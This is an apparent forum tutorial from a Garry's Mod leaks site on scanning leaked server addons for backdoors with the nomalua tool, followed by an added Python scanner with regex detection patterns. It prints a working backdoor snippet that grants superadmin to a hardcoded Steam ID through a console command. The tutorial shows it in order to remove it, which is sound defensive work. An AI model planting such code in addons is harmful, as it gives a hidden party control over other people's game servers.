Garry's Mod Leaks

- How To Look For Backdoors On Leaks -

Submitted by TupacAmaruShakur, Thread ID: 113573

28-12-2018, 07:34 AM
This post was last modified: 28-12-2018, 08:03 AM by TupacAmaruShakur
Hello,

I present this tutorial that will help you find out whether your server suffers from a backdoor. An addon can be infected, and the people who infected it can put superadmin on your server or do more malicious damage.
Remember that a person cannot access your FTP if you have not given them the access yourself.

Step 1: Find the backdoor

- You will first download this addon and put it in the addons folder of your server.

1 - Click me and I will download what you need: https://github.com/THABBuzzkill/nomalua/archive/master.zip


Where the download came from and more instructions

2 -

- Add the files/addons you want scanned to your addons folder.
- Then you restart your server and connect to it once it reboots.
- Once on your server, you type in your console (in-game console):

nomalua_scan


- Your server will appear to crash during scanning, i.e. for 10-15 seconds, but it does not actually crash, so stay on.
- After the "crash" of 10-15 seconds, re-open your console (in-game) and you'll observe something like:


1 - FILESYS (Reading file contents) addons/smugglesystem/lua/autorun/server/smug_server.lua:138 local PositionFile = file.Read("craphead_scripts/smuggle_system/".. string.lower(game.GetMap()) .."/smuggletruck_location.txt", "DATA")
1 - MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end
4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl,
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( "playerlist.txt" )
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read("playerlist.txt")
1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( "playerlist.txt" )
4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id)
2 - AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 Guillaume (STEAM_0:0:71249946)
1 - MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES
2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "FetchItems", function( namespace, cat, offset, perpage, ... ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { ... } ) end )
1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end )
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:62 Eusion (STEAM_0:0:20450406) (3 commits on old SVN)


We see many things.

For example, for an infected addon you will see something like this:

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


The 'if ( ply:SteamID() == "STEAM_0:1:64045285") then' is clearly a backdoor.
Look at the lines 'AUTHENT (Presence of Steam ID)' and if

Step 2: Remove backdoor

We will take that line:

2 - AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then


To remove the infection, you go to the path given: addons/prisonrptimer/lua/autorun, you open prisonrp_timer.lua and then you go to line 101.
We have this at line 101, and you just have to remove that person so they will not have the opportunity to do things:

concommand.Add( "EFM", function(ply)
    -- hardcoded Steam ID check: the backdoor the scan flagged at line 101
    if ( ply:SteamID() == "STEAM_0:1:64045285") then
        RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
    else
        ply:ChatPrint("Rcon commands Enable, " .. ply:Name() .. ".")
    end
end)


I hope I helped you with this!


Scan and other information

SHA256: 211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
File name: detect.zip
Detection ratio: 0 / 54
Analysis date: 2016-07-21 06:37:35 UTC


Contained files
This file is a compressed stream containing 11 files.
[+] nomalua/lua/autorun/init.lua unknown 245 Bytes
[+] nomalua/lua/cl_nomalua.lua unknown 191 Bytes
[+] nomalua/lua/sh_nomalua.lua unknown 109 Bytes
[+] nomalua/lua/sv_nomalua.lua unknown 3451 Bytes
[+] nomalua/lua/sv_nomalua_checkdefs.lua unknown 1950 Bytes
[+] nomalua/lua/sv_nomalua_utils.lua unknown 2137 Bytes
[+] nomalua/lua/sv_nomalua_whitelist.lua unknown 1188 Bytes
[+] nomalua/readme.txt unknown 6395 Bytes
[+] nomalua/ directory 0 Bytes
[+] nomalua/lua/ directory 0 Bytes

I HAVE ANOTHER SCANNER ON THE WAY, BOTH ARE GOOD, SO IT'S OPINION. TELL ME WHAT YOU THINK!
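Added example (not part of the post and not nomalua's own code): a small Python scanner that walks addon .lua files and reports the same kinds of patterns the nomalua_scan output above shows, in the same "weight - CATEGORY (reason) path:line code" format, with a whitelist for known credit files such as the DarkRP cl_chat.lua the scan above flags. The weights, categories and regexes are this example's assumptions, not nomalua's real checkdefs; the sample addon text is constructed from the backdoor snippet in the post.

```python
import re
from pathlib import Path

# (weight, category, reason, pattern): all constructed for this example, not nomalua's checkdefs
CHECKS = [
    (2, "AUTHENT", "Presence of Steam ID", re.compile(r"STEAM_\d:\d:\d+")),
    (4, "NETWORK", "HTTP server call", re.compile(r"\bhttp\.(Fetch|Post)\s*\(")),
    (1, "FILESYS", "Reading file contents", re.compile(r"\bfile\.Read\s*\(")),
    (2, "FILESYS", "File deletion", re.compile(r"\bfile\.Delete\s*\(")),
    (1, "MISC", "References global table", re.compile(r"\b_G\s*\[")),
    (3, "MISC", "Runs code from a string", re.compile(r"\b(RunString|CompileString)\s*\(")),
]

def scan_source(path, source, whitelist=()):
    """Scan one Lua file's text; return (weight, category, reason, 'path:line', code) tuples.
    Files whose path starts with a whitelist entry (e.g. gamemode credit lists) are skipped."""
    if any(path.startswith(w) for w in whitelist):
        return []
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for weight, cat, reason, rx in CHECKS:
            if rx.search(line):
                findings.append((weight, cat, reason, f"{path}:{lineno}", line.strip()))
    return findings

def scan_tree(root, whitelist=()):
    """Scan every .lua file under root (e.g. the server's addons folder), highest weight first."""
    found = []
    for p in Path(root).rglob("*.lua"):
        rel = p.relative_to(root).as_posix()
        found += scan_source(rel, p.read_text(encoding="utf-8", errors="replace"), whitelist)
    return sorted(found, key=lambda f: -f[0])

def format_findings(findings):
    """Render findings in the same layout as the nomalua console output."""
    return "\n".join(f"{w} - {c} ({r}) {loc} {code}" for w, c, r, loc, code in findings)

# Constructed sample: the backdoor from the post plus one ordinary file read.
SAMPLE_ADDON = '''concommand.Add( "EFM", function(ply)
    if ( ply:SteamID() == "STEAM_0:1:64045285") then
        RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
    end
end)
local fileRead = file.Read( "playerlist.txt" )'''

if __name__ == "__main__":
    print(format_findings(scan_source("addons/prisonrptimer/lua/autorun/prisonrp_timer.lua", SAMPLE_ADDON)))
```

Point scan_tree at a copy of the addons folder to review a leaked addon before it ever touches the live server; AUTHENT hits in files that are not credit lists deserve a manual look at the surrounding lines, as the post describes.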